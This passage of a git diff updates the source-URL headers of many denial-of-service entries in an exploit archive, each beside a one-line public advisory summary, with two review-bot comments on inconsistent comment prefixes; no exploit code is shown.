238df7dd7..58f4a871c 100644 --- a/exploits/multiple/dos/30498.txt +++ b/exploits/multiple/dos/30498.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25327/info +source: https://www.securityfocus.com/bid/25327/info Live For Speed is prone to four vulnerabilities, including buffer-overflow and denial-of-service issues. diff --git a/exploits/multiple/dos/30513.txt b/exploits/multiple/dos/30513.txt index ca459939a..9f6becf0b 100644 --- a/exploits/multiple/dos/30513.txt +++ b/exploits/multiple/dos/30513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25374/info +source: https://www.securityfocus.com/bid/25374/info The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input. diff --git a/exploits/multiple/dos/30519.txt b/exploits/multiple/dos/30519.txt index 65cb67551..b6eabb4e3 100644 --- a/exploits/multiple/dos/30519.txt +++ b/exploits/multiple/dos/30519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25411/info +source: https://www.securityfocus.com/bid/25411/info Asura Engine is prone to a remote stack-based buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/30524.txt b/exploits/multiple/dos/30524.txt index d26b56f88..4eeac9963 100644 --- a/exploits/multiple/dos/30524.txt +++ b/exploits/multiple/dos/30524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25426/info +source: https://www.securityfocus.com/bid/25426/info Soldat is prone to multiple remote denial-of-service vulnerabilities because of how the game software handles unexpected input. diff --git a/exploits/multiple/dos/30526.txt b/exploits/multiple/dos/30526.txt index 22f7104d6..a168f529c 100644 --- a/exploits/multiple/dos/30526.txt +++ b/exploits/multiple/dos/30526.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30527.txt b/exploits/multiple/dos/30527.txt index 9519c2e9f..329e52965 100644 --- a/exploits/multiple/dos/30527.txt +++ b/exploits/multiple/dos/30527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30528.txt b/exploits/multiple/dos/30528.txt index 77f14e154..484968c5d 100644 --- a/exploits/multiple/dos/30528.txt +++ b/exploits/multiple/dos/30528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25436/info +source: https://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. diff --git a/exploits/multiple/dos/30529.txt b/exploits/multiple/dos/30529.txt index 51058a89b..528c963d3 100644 --- a/exploits/multiple/dos/30529.txt +++ b/exploits/multiple/dos/30529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25437/info +source: https://www.securityfocus.com/bid/25437/info Media Player Classic is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data. diff --git a/exploits/multiple/dos/30540.txt b/exploits/multiple/dos/30540.txt index ea991617d..56bb64248 100644 --- a/exploits/multiple/dos/30540.txt +++ b/exploits/multiple/dos/30540.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25478/info +source: https://www.securityfocus.com/bid/25478/info StarCraft Brood War is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/30566.txt b/exploits/multiple/dos/30566.txt index 8cc61ff6c..04c5d2f56 100644 --- a/exploits/multiple/dos/30566.txt +++ b/exploits/multiple/dos/30566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25559/info +source: https://www.securityfocus.com/bid/25559/info Alien Arena 2007 is prone to multiple remote vulnerabilities, including a denial-of-service vulnerability and a format-string vulnerability. diff --git a/exploits/multiple/dos/30574.txt b/exploits/multiple/dos/30574.txt index 38c0f9b2c..eb4a3395c 100644 --- a/exploits/multiple/dos/30574.txt +++ b/exploits/multiple/dos/30574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25625/info +source: https://www.securityfocus.com/bid/25625/info CellFactor: Revolution is prone to multiple remote code-execution vulnerabilities, including a buffer-overflow issue and a format-string issue. diff --git a/exploits/multiple/dos/30592.py b/exploits/multiple/dos/30592.py index 7dea054e9..7d2b8910b 100755 --- a/exploits/multiple/dos/30592.py +++ b/exploits/multiple/dos/30592.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25696/info +source: https://www.securityfocus.com/bid/25696/info Python's imageop module is prone to multiple integer-overflow vulnerabilities because it fails to properly bounds-check user-supplied input to ensure that integer operations do not overflow. diff --git a/exploits/multiple/dos/30644.txt b/exploits/multiple/dos/30644.txt index db8867977..94e83ae9c 100644 --- a/exploits/multiple/dos/30644.txt +++ b/exploits/multiple/dos/30644.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25944/info +source: https://www.securityfocus.com/bid/25944/info Dawn of Time MUD server is prone to multiple format-string vulnerabilities. diff --git a/exploits/multiple/dos/30702.html b/exploits/multiple/dos/30702.html index 07f904d24..d03c2975a 100644 --- a/exploits/multiple/dos/30702.html +++ b/exploits/multiple/dos/30702.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26172/info +source: https://www.securityfocus.com/bid/26172/info Mozilla Firefox is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/multiple/dos/30713.html b/exploits/multiple/dos/30713.html index 539f5c5ec..ced32df43 100644 --- a/exploits/multiple/dos/30713.html +++ b/exploits/multiple/dos/30713.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26216/info +source: https://www.securityfocus.com/bid/26216/info Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service. diff --git a/exploits/multiple/dos/30779.txt b/exploits/multiple/dos/30779.txt index 2bd50f887..2adf7cadf 100644 --- a/exploits/multiple/dos/30779.txt +++ b/exploits/multiple/dos/30779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26502/info +source: https://www.securityfocus.com/bid/26502/info Rigs of Rods is prone to a remote buffer-overflow because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/30791.txt b/exploits/multiple/dos/30791.txt index 24919b6b5..4968002b3 100644 --- a/exploits/multiple/dos/30791.txt +++ b/exploits/multiple/dos/30791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26516/info +source: https://www.securityfocus.com/bid/26516/info Multiple denial-of-service vulnerabilities affect I Hear U because the application fails to handle specially crafted packets. 
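Review bot: The comment prefix is applied inconsistently across file types: the `source:` line in exploits/multiple/dos/27901.java and 28182.java stays bare even though Java takes the same `//` marker that the .c files in this patch receive, and the .pl and .py headers (26922.pl, 27730.py, 29875.py, 30592.py among others) are also left as plain text. exploits/multiple/dos/27969.c shows the consistent shape, with every header line in its hunk already prefixed. Suggest either extending the conversion to each language's own comment marker or stating in the commit message that only .c files are in scope.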
diff --git a/exploits/multiple/dos/30814.txt b/exploits/multiple/dos/30814.txt index 12b177b29..6a99bc74a 100644 --- a/exploits/multiple/dos/30814.txt +++ b/exploits/multiple/dos/30814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26588/info +source: https://www.securityfocus.com/bid/26588/info Skype is prone to a remote denial-of-service vulnerability because of a NULL-pointer dereference flaw. diff --git a/exploits/multiple/dos/30856.txt b/exploits/multiple/dos/30856.txt index cb2b2f23e..1983641f7 100644 --- a/exploits/multiple/dos/30856.txt +++ b/exploits/multiple/dos/30856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26771/info +source: https://www.securityfocus.com/bid/26771/info Easy File Sharing Web Server is prone to a directory-traversal and multiple information-disclosure vulnerabilities. diff --git a/exploits/multiple/dos/30885.txt b/exploits/multiple/dos/30885.txt index 8b49d9c37..e10a0bcbb 100644 --- a/exploits/multiple/dos/30885.txt +++ b/exploits/multiple/dos/30885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26856/info +source: https://www.securityfocus.com/bid/26856/info QK SMTP Server is prone to multiple remote denial-of-service vulnerabilities that occur when handling malformed SMTP commands. diff --git a/exploits/multiple/dos/30896.txt b/exploits/multiple/dos/30896.txt index 6053d50ef..1665a5923 100644 --- a/exploits/multiple/dos/30896.txt +++ b/exploits/multiple/dos/30896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26913/info +source: https://www.securityfocus.com/bid/26913/info Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets. diff --git a/exploits/multiple/dos/30903.c b/exploits/multiple/dos/30903.c index 9387a6634..4276d0a1e 100644 --- a/exploits/multiple/dos/30903.c +++ b/exploits/multiple/dos/30903.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26945/info +// source: https://www.securityfocus.com/bid/26945/info The 'id3lib' library is prone to a buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/30906.c b/exploits/multiple/dos/30906.c index fc74de451..fa5aca079 100644 --- a/exploits/multiple/dos/30906.c +++ b/exploits/multiple/dos/30906.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26953/info +// source: https://www.securityfocus.com/bid/26953/info ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/30922.c b/exploits/multiple/dos/30922.c index 794a7e5cb..6ed67f186 100644 --- a/exploits/multiple/dos/30922.c +++ b/exploits/multiple/dos/30922.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26979/info +// source: https://www.securityfocus.com/bid/26979/info WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/30943.txt b/exploits/multiple/dos/30943.txt index 076161ceb..a35f52a54 100644 --- a/exploits/multiple/dos/30943.txt +++ b/exploits/multiple/dos/30943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27048/info +source: https://www.securityfocus.com/bid/27048/info Libnemesi is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/dos/30974.txt b/exploits/multiple/dos/30974.txt index 11ae1faec..f3663964d 100644 --- a/exploits/multiple/dos/30974.txt +++ b/exploits/multiple/dos/30974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27110/info +source: https://www.securityfocus.com/bid/27110/info Asterisk is prone to a remote denial-of-service vulnerability. 
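Review bot: In the 30903.c, 30906.c and 30922.c hunks only the `source:` line gains a `//` prefix, while the unchanged context line that follows it (for example "The 'id3lib' library is prone to a buffer-overflow vulnerability.") is still bare prose at file scope, so the advisory header is only partly commented. Either wrap the whole header in one `/* ... */` block or prefix every header line, so that the first four lines of each .c file are consistently a comment.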
diff --git a/exploits/multiple/dos/30989.txt b/exploits/multiple/dos/30989.txt index c093bd43b..549580ff7 100644 --- a/exploits/multiple/dos/30989.txt +++ b/exploits/multiple/dos/30989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27141/info +source: https://www.securityfocus.com/bid/27141/info Pragma Systems FortressSSH is prone to a remote denial-of-service vulnerability because it fails to adequately handle certain exceptions when processing overly long user-supplied input. diff --git a/exploits/multiple/dos/30990.txt b/exploits/multiple/dos/30990.txt index ed5f23d8e..44b168c48 100644 --- a/exploits/multiple/dos/30990.txt +++ b/exploits/multiple/dos/30990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27142/info +source: https://www.securityfocus.com/bid/27142/info Foxit WAC Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/30991.txt b/exploits/multiple/dos/30991.txt index a9b63249f..e4486ca21 100644 --- a/exploits/multiple/dos/30991.txt +++ b/exploits/multiple/dos/30991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27143/info +source: https://www.securityfocus.com/bid/27143/info Pragma TelnetServer is prone to a denial-of-service vulnerability because it fails to adequately handle certain telnet options. diff --git a/exploits/multiple/dos/31100.txt b/exploits/multiple/dos/31100.txt index 2032ff867..56f54ca72 100644 --- a/exploits/multiple/dos/31100.txt +++ b/exploits/multiple/dos/31100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27593/info +source: https://www.securityfocus.com/bid/27593/info Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input. diff --git a/exploits/multiple/dos/31128.txt b/exploits/multiple/dos/31128.txt index 38ce21324..4b2e38476 100644 
--- a/exploits/multiple/dos/31128.txt +++ b/exploits/multiple/dos/31128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27701/info +source: https://www.securityfocus.com/bid/27701/info Multiple IEA Software products are prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/31136.txt b/exploits/multiple/dos/31136.txt index e514c2526..f229f4ff4 100644 --- a/exploits/multiple/dos/31136.txt +++ b/exploits/multiple/dos/31136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27728/info +source: https://www.securityfocus.com/bid/27728/info Multiple cyan soft products are affected by a format-string vulnerability because they fail to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function. diff --git a/exploits/multiple/dos/31148.txt b/exploits/multiple/dos/31148.txt index b5c26ceef..cbb6c351b 100644 --- a/exploits/multiple/dos/31148.txt +++ b/exploits/multiple/dos/31148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27734/info +source: https://www.securityfocus.com/bid/27734/info Opium OPI Server and CyanPrintIP are prone to a denial-of-service vulnerability and a format-string vulnerability. diff --git a/exploits/multiple/dos/31150.txt b/exploits/multiple/dos/31150.txt index c9a7431c5..1522c9d76 100644 --- a/exploits/multiple/dos/31150.txt +++ b/exploits/multiple/dos/31150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27742/info +source: https://www.securityfocus.com/bid/27742/info RPM Remote Print Manager is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer. diff --git a/exploits/multiple/dos/31203.txt b/exploits/multiple/dos/31203.txt index c4dbce58e..bdd1f6ac2 100644 --- a/exploits/multiple/dos/31203.txt +++ b/exploits/multiple/dos/31203.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27812/info +source: https://www.securityfocus.com/bid/27812/info Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames. diff --git a/exploits/multiple/dos/31232.txt b/exploits/multiple/dos/31232.txt index 9c13d6342..e2b1aec83 100644 --- a/exploits/multiple/dos/31232.txt +++ b/exploits/multiple/dos/31232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27873/info +source: https://www.securityfocus.com/bid/27873/info Foxit WAC Remote Access Server is prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/31271.txt b/exploits/multiple/dos/31271.txt index 68a0d3b8a..d9b724ddc 100644 --- a/exploits/multiple/dos/31271.txt +++ b/exploits/multiple/dos/31271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27914/info +source: https://www.securityfocus.com/bid/27914/info Sybase MobiLink is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/31285.txt b/exploits/multiple/dos/31285.txt index 79d2e88e4..97ed3304d 100644 --- a/exploits/multiple/dos/31285.txt +++ b/exploits/multiple/dos/31285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27940/info +source: https://www.securityfocus.com/bid/27940/info Zilab Chat and Instant Messaging (ZIM) Server is prone to multiple vulnerabilities, including denial-of-service issues and memory-corruption issues. diff --git a/exploits/multiple/dos/31327.txt b/exploits/multiple/dos/31327.txt index 7729067a8..a6a31dbaf 100644 --- a/exploits/multiple/dos/31327.txt +++ b/exploits/multiple/dos/31327.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28080/info +source: https://www.securityfocus.com/bid/28080/info Borland StarTeam is prone to multiple issues, including multiple integer-overflow vulnerabilities, a heap-overflow vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/31343.txt b/exploits/multiple/dos/31343.txt index e1d08cece..f953471b3 100644 --- a/exploits/multiple/dos/31343.txt +++ b/exploits/multiple/dos/31343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28125/info +source: https://www.securityfocus.com/bid/28125/info Sun Java Runtime Environment is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/31376.txt b/exploits/multiple/dos/31376.txt index bbed20065..04274e34e 100644 --- a/exploits/multiple/dos/31376.txt +++ b/exploits/multiple/dos/31376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28169/info +source: https://www.securityfocus.com/bid/28169/info Acronis True Image Echo Enterprise Server is prone to multiple remote denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31378.txt b/exploits/multiple/dos/31378.txt index acec98496..0d3d9dc83 100644 --- a/exploits/multiple/dos/31378.txt +++ b/exploits/multiple/dos/31378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28175/info +source: https://www.securityfocus.com/bid/28175/info RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/multiple/dos/31542.txt b/exploits/multiple/dos/31542.txt index 7eaadb4e7..bf1380031 100644 --- a/exploits/multiple/dos/31542.txt +++ b/exploits/multiple/dos/31542.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28468/info +source: https://www.securityfocus.com/bid/28468/info IBM solidDB is prone to a format-string vulnerability affecting the logging function and three denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31728.txt b/exploits/multiple/dos/31728.txt index 18dbf73f1..a8a429814 100644 --- a/exploits/multiple/dos/31728.txt +++ b/exploits/multiple/dos/31728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29026/info +source: https://www.securityfocus.com/bid/29026/info Call of Duty is prone to a denial-of-service vulnerability because the application fails to handle specially crafted commands. diff --git a/exploits/multiple/dos/31785.txt b/exploits/multiple/dos/31785.txt index 093b45ae2..c8592efa4 100644 --- a/exploits/multiple/dos/31785.txt +++ b/exploits/multiple/dos/31785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29190/info +source: https://www.securityfocus.com/bid/29190/info Multiple operating systems are prone to remote denial-of-service vulnerabilities that occur when affected operating systems are acting as IPv6 routers. diff --git a/exploits/multiple/dos/31817.html b/exploits/multiple/dos/31817.html index 765433324..b7cd04824 100644 --- a/exploits/multiple/dos/31817.html +++ b/exploits/multiple/dos/31817.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29318/info +source: https://www.securityfocus.com/bid/29318/info Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe. diff --git a/exploits/multiple/dos/31872.py b/exploits/multiple/dos/31872.py index 55ec1efd0..889f0f3f0 100755 --- a/exploits/multiple/dos/31872.py +++ b/exploits/multiple/dos/31872.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29517/info +source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/31919.c b/exploits/multiple/dos/31919.c index bad7860d8..10de1009e 100644 --- a/exploits/multiple/dos/31919.c +++ b/exploits/multiple/dos/31919.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29723/info +// source: https://www.securityfocus.com/bid/29723/info S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. diff --git a/exploits/multiple/dos/31931.txt b/exploits/multiple/dos/31931.txt index 0d8858373..01439ff36 100644 --- a/exploits/multiple/dos/31931.txt +++ b/exploits/multiple/dos/31931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29759/info +source: https://www.securityfocus.com/bid/29759/info Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/31932.txt b/exploits/multiple/dos/31932.txt index fb6fe78e7..03092dd18 100644 --- a/exploits/multiple/dos/31932.txt +++ b/exploits/multiple/dos/31932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29760/info +source: https://www.securityfocus.com/bid/29760/info Skulltag is prone to a vulnerability that can cause denial-of-service conditions. diff --git a/exploits/multiple/dos/31957.txt b/exploits/multiple/dos/31957.txt index bf988ee9f..0df6eba2d 100644 --- a/exploits/multiple/dos/31957.txt +++ b/exploits/multiple/dos/31957.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29888/info +source: https://www.securityfocus.com/bid/29888/info World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/31958.txt b/exploits/multiple/dos/31958.txt index 6f3f3762f..20f66fb56 100644 --- a/exploits/multiple/dos/31958.txt +++ b/exploits/multiple/dos/31958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29889/info +source: https://www.securityfocus.com/bid/29889/info SunAge is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/31998.txt b/exploits/multiple/dos/31998.txt index 392576914..a19a5f71d 100644 --- a/exploits/multiple/dos/31998.txt +++ b/exploits/multiple/dos/31998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29997/info +source: https://www.securityfocus.com/bid/29997/info S.T.A.L.K.E.R is prone to multiple remote vulnerabilities: diff --git a/exploits/multiple/dos/31999.txt b/exploits/multiple/dos/31999.txt index 6969ae8a7..74ad1f7ec 100644 --- a/exploits/multiple/dos/31999.txt +++ b/exploits/multiple/dos/31999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30010/info +source: https://www.securityfocus.com/bid/30010/info IBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error. diff --git a/exploits/multiple/dos/32006.txt b/exploits/multiple/dos/32006.txt index 4ef2b64f2..b7afb9d1f 100644 --- a/exploits/multiple/dos/32006.txt +++ b/exploits/multiple/dos/32006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30020/info +source: https://www.securityfocus.com/bid/30020/info Wireshark is prone to multiple vulnerabilities, including an information-disclosure issue and denial-of-service issues. diff --git a/exploits/multiple/dos/32086.c b/exploits/multiple/dos/32086.c index e79b065f0..ed0956762 100644 
--- a/exploits/multiple/dos/32086.c +++ b/exploits/multiple/dos/32086.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30299/info +// source: https://www.securityfocus.com/bid/30299/info SWAT 4 is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle certain input. diff --git a/exploits/multiple/dos/32104.txt b/exploits/multiple/dos/32104.txt index 5d8c5a75f..748315e11 100644 --- a/exploits/multiple/dos/32104.txt +++ b/exploits/multiple/dos/32104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30340/info +source: https://www.securityfocus.com/bid/30340/info ZDaemon is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions. diff --git a/exploits/multiple/dos/32125.txt b/exploits/multiple/dos/32125.txt index d125dd7e4..a5e624b4a 100644 --- a/exploits/multiple/dos/32125.txt +++ b/exploits/multiple/dos/32125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30427/info +source: https://www.securityfocus.com/bid/30427/info Unreal Tournament 2004 is prone to a remote denial-of-service vulnerability because the application fails to handle NULL-pointer exceptions. diff --git a/exploits/multiple/dos/32127.txt b/exploits/multiple/dos/32127.txt index 0cca29040..15e7cfee6 100644 --- a/exploits/multiple/dos/32127.txt +++ b/exploits/multiple/dos/32127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30430/info +source: https://www.securityfocus.com/bid/30430/info Unreal Tournament 3 is prone to multiple remote vulnerabilities, including a denial-of-service issue and a memory-corruption issue. diff --git a/exploits/multiple/dos/32192.txt b/exploits/multiple/dos/32192.txt index 9f8e97f2e..e776fc65a 100644 --- a/exploits/multiple/dos/32192.txt +++ b/exploits/multiple/dos/32192.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30582/info +source: https://www.securityfocus.com/bid/30582/info Halo: Combat Evolved is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. diff --git a/exploits/multiple/dos/32193.txt b/exploits/multiple/dos/32193.txt index cb6181694..79c05c66b 100644 --- a/exploits/multiple/dos/32193.txt +++ b/exploits/multiple/dos/32193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30589/info +source: https://www.securityfocus.com/bid/30589/info The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input. diff --git a/exploits/multiple/dos/32194.txt b/exploits/multiple/dos/32194.txt index 21a52ce6d..f573a3d45 100644 --- a/exploits/multiple/dos/32194.txt +++ b/exploits/multiple/dos/32194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30605/info +source: https://www.securityfocus.com/bid/30605/info NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32195.txt b/exploits/multiple/dos/32195.txt index b98f718ac..7ce9bad75 100644 --- a/exploits/multiple/dos/32195.txt +++ b/exploits/multiple/dos/32195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30606/info +source: https://www.securityfocus.com/bid/30606/info WinGate is prone to a remote denial-of-service vulnerability affecting the application's IMAP email server. diff --git a/exploits/multiple/dos/32222.rb b/exploits/multiple/dos/32222.rb index b210a9852..690f8c004 100755 --- a/exploits/multiple/dos/32222.rb +++ b/exploits/multiple/dos/32222.rb 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30644/info +source: https://www.securityfocus.com/bid/30644/info Ruby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service: diff --git a/exploits/multiple/dos/32310.txt b/exploits/multiple/dos/32310.txt index e069c2543..02570cb02 100644 --- a/exploits/multiple/dos/32310.txt +++ b/exploits/multiple/dos/32310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30970/info +source: https://www.securityfocus.com/bid/30970/info Softalk Mail Server is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/32311.html b/exploits/multiple/dos/32311.html index bca675f53..e57ed31c3 100644 --- a/exploits/multiple/dos/32311.html +++ b/exploits/multiple/dos/32311.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30975/info +source: https://www.securityfocus.com/bid/30975/info Google Chrome is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32335.js b/exploits/multiple/dos/32335.js index 4b744123b..146940f2a 100644 --- a/exploits/multiple/dos/32335.js +++ b/exploits/multiple/dos/32335.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31035/info +source: https://www.securityfocus.com/bid/31035/info Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers. diff --git a/exploits/multiple/dos/32362.txt b/exploits/multiple/dos/32362.txt index c08187484..235a2ec09 100644 --- a/exploits/multiple/dos/32362.txt +++ b/exploits/multiple/dos/32362.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31140/info +source: https://www.securityfocus.com/bid/31140/info Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. diff --git a/exploits/multiple/dos/32381.js b/exploits/multiple/dos/32381.js index db25a363f..fa657e322 100644 --- a/exploits/multiple/dos/32381.js +++ b/exploits/multiple/dos/32381.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31155/info +source: https://www.securityfocus.com/bid/31155/info Avant Browser is prone to an integer-overflow vulnerability that occurs in the JavaScript engine. diff --git a/exploits/multiple/dos/32386.txt b/exploits/multiple/dos/32386.txt index d7aa11c26..36a8b8c9c 100644 --- a/exploits/multiple/dos/32386.txt +++ b/exploits/multiple/dos/32386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31205/info +source: https://www.securityfocus.com/bid/31205/info Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. diff --git a/exploits/multiple/dos/32400.html b/exploits/multiple/dos/32400.html index 8d7fe3a03..a3330ecdf 100644 --- a/exploits/multiple/dos/32400.html +++ b/exploits/multiple/dos/32400.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31294/info +source: https://www.securityfocus.com/bid/31294/info Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/32581.txt b/exploits/multiple/dos/32581.txt index a9e34f7cc..a1b6bb6f7 100644 --- a/exploits/multiple/dos/32581.txt +++ 